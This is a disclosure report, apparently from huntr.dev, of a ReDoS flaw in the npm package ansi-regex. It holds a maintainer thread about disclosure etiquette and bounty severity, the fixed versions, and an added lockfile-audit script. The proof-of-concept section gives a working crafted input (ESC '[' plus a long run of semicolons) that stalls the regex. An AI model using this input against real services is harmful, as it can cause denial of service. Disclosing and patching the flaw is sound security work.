Inefficient Regular Expression Complexity in chalk/ansi-regex
Reported on Sep 9th 2021
✍️ Description
It can cause a denial of service when matching crafted invalid ANSI escape codes.
🕵️♂️ Proof of Concept
// PoC.mjs
import ansiRegex from 'ansi-regex';

for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // Invalid escape sequence: ESC [ followed by a growing run of ';'
    var attack_str = "\u001B[" + ";".repeat(i * 10000);
    ansiRegex().test(attack_str);
    // Time spent in the regex match for this input length
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Hi @admin, could you help me contact the maintainer to confirm the vulnerability and patch?
Hey Yeting, of course. I've just sent security@tidelift.com an email, as per their security policy. I'll update you when we hear back from them.
@yetingli This is the second time you have been told to do a responsible closure. That means not submitting a pull request or opening an issue until the report has been validated.
The severity (and IMHO bounty) in this report is also too high. The issue affects pretty much no one as ansi-regex is mostly used for command-line tools, not in servers.
Thank you for your reply, @Sindre Sorhus. I just did a responsible closure on huntr.dev, but I accidentally pulled when I submitted the patch. Thank you again for your reminder!
The bounty setting may be related to the popularity of the project? I'm not sure, you @Sindre Sorhus can ask @admin?
Fixed in:
- 6.0.1: https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
- 5.0.1: https://github.com/chalk/ansi-regex/releases/tag/v5.0.1
We also have:
- 4.1.1: https://github.com/chalk/ansi-regex/releases/tag/v4.1.1
This is a tag without a release. It includes the same fix as 5.0.1 and 6.0.1 (https://github.com/chalk/ansi-regex/pull/37).
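A dependency check built on the fixed versions listed above, as an added example that is not part of the original report or the ansi-regex project: it scans the `packages` map of an npm lockfile (v2/v3 layout) for ansi-regex copies that predate the fix in their major line. The lockfile contents and the `old-cli` package name are constructed; major lines with no fix listed on this page are reported as `unknown` rather than guessed.

```javascript
// Fixed versions per major line, taken from this page.
const FIXED = { 4: '4.1.1', 5: '5.0.1', 6: '6.0.1' };

// Parse "x.y.z" into numbers; pre-release/build suffixes are ignored (assumption).
function parse(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(version));
  return m ? m.slice(1).map(Number) : null;
}

function compare(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// 'fixed', 'unpatched', or 'unknown' (unparseable, or no fix listed for that major).
function classify(version) {
  const v = parse(version);
  const fix = v && FIXED[v[0]];
  if (!fix) return 'unknown';
  return compare(v, parse(fix)) >= 0 ? 'fixed' : 'unpatched';
}

// Walk every installed copy, including nested ones such as
// node_modules/a/node_modules/ansi-regex.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path.endsWith('node_modules/ansi-regex')) continue;
    findings.push({ path, version: meta.version, status: classify(meta.version) });
  }
  return findings;
}

// Constructed sample lockfile (not from a real project).
const sampleLock = {
  lockfileVersion: 2,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/ansi-regex': { version: '5.0.0' },
    'node_modules/strip-ansi/node_modules/ansi-regex': { version: '6.0.1' },
    'node_modules/old-cli/node_modules/ansi-regex': { version: '2.1.1' },
    'node_modules/wrap-ansi/node_modules/ansi-regex': { version: '4.1.0' },
  },
};
for (const f of auditLockfile(sampleLock)) {
  console.log(`${f.status.padEnd(9)} ${f.version}  ${f.path}`);
}
```

In a real project, pass `JSON.parse` of `package-lock.json` to `auditLockfile` and treat every `unpatched` or `unknown` row as a copy to upgrade or review.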